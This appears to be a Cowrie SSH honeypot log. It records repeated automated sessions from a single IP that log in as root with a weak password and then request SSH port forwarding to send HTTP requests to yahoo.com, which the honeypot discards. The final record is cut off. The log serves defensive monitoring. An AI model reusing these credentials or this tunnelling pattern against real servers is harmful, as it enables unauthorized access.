{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1388,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb91ec8ec35a","protocol":"ssh","message":"New connection: 213.209.150.239:1388 (1.2.3.4:22) [session: eb91ec8ec35a]","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.752026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.753369Z","src_ip":"213.209.150.239","session":"eb91ec8ec35a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:43.800462Z","src_ip":"213.209.150.239","session":"eb91ec8ec35a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.035273Z","src_ip":"213.209.150.239","session":"eb91ec8ec35a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":4952,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:4952","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.083504Z","session":"eb91ec8ec35a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.130814Z","src_ip":"213.209.150.239","session":"eb91ec8ec35a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19798,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19798","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.265700Z","session":"eb91ec8ec35a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.312942Z","src_ip":"213.209.150.239","session":"eb91ec8ec35a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.360672Z","src_ip":"213.209.150.239","session":"eb91ec8ec35a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1432,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff3f7bcaf89d","protocol":"ssh","message":"New connection: 213.209.150.239:1432 (1.2.3.4:22) [session: ff3f7bcaf89d]","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.406749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.408188Z","src_ip":"213.209.150.239","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.455665Z","src_ip":"213.209.150.239","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.690174Z","src_ip":"213.209.150.239","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":31757,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31757","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.738428Z","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.785656Z","src_ip":"213.209.150.239","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":4128,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4128","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.921564Z","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:44.968731Z","src_ip":"213.209.150.239","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.018189Z","src_ip":"213.209.150.239","session":"ff3f7bcaf89d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1491,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ace27078620","protocol":"ssh","message":"New connection: 213.209.150.239:1491 (1.2.3.4:22) [session: 8ace27078620]","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.073617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.074464Z","src_ip":"213.209.150.239","session":"8ace27078620"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.130885Z","src_ip":"213.209.150.239","session":"8ace27078620"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.412609Z","src_ip":"213.209.150.239","session":"8ace27078620"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":31218,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:31218","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.469907Z","session":"8ace27078620"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.526585Z","src_ip":"213.209.150.239","session":"8ace27078620"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":7518,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7518","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.683118Z","session":"8ace27078620"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.739972Z","src_ip":"213.209.150.239","session":"8ace27078620"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.797756Z","src_ip":"213.209.150.239","session":"8ace27078620"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1545,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f43e1ab119d","protocol":"ssh","message":"New connection: 213.209.150.239:1545 (1.2.3.4:22) [session: 0f43e1ab119d]","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.843952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.844947Z","src_ip":"213.209.150.239","session":"0f43e1ab119d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:45.892039Z","src_ip":"213.209.150.239","session":"0f43e1ab119d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.127848Z","src_ip":"213.209.150.239","session":"0f43e1ab119d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":4108,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4108","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.177062Z","session":"0f43e1ab119d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.224877Z","src_ip":"213.209.150.239","session":"0f43e1ab119d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24428,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24428","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.361704Z","session":"0f43e1ab119d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.409062Z","src_ip":"213.209.150.239","session":"0f43e1ab119d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.456999Z","src_ip":"213.209.150.239","session":"0f43e1ab119d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1595,"dst_ip":"1.2.3.4","dst_port":22,"session":"594bb9a0436f","protocol":"ssh","message":"New connection: 213.209.150.239:1595 (1.2.3.4:22) [session: 594bb9a0436f]","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.512602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.513532Z","src_ip":"213.209.150.239","session":"594bb9a0436f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.570034Z","src_ip":"213.209.150.239","session":"594bb9a0436f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.852471Z","src_ip":"213.209.150.239","session":"594bb9a0436f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":17319,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17319","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.910194Z","session":"594bb9a0436f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:46.966931Z","src_ip":"213.209.150.239","session":"594bb9a0436f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":3848,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:3848","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.123469Z","session":"594bb9a0436f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.180912Z","src_ip":"213.209.150.239","session":"594bb9a0436f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.238534Z","src_ip":"213.209.150.239","session":"594bb9a0436f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1646,"dst_ip":"1.2.3.4","dst_port":22,"session":"5843090c9b07","protocol":"ssh","message":"New connection: 213.209.150.239:1646 (1.2.3.4:22) [session: 5843090c9b07]","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.294347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:47.295499Z","src_ip":"213.209.150.239","session":"5843090c9b07"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@opens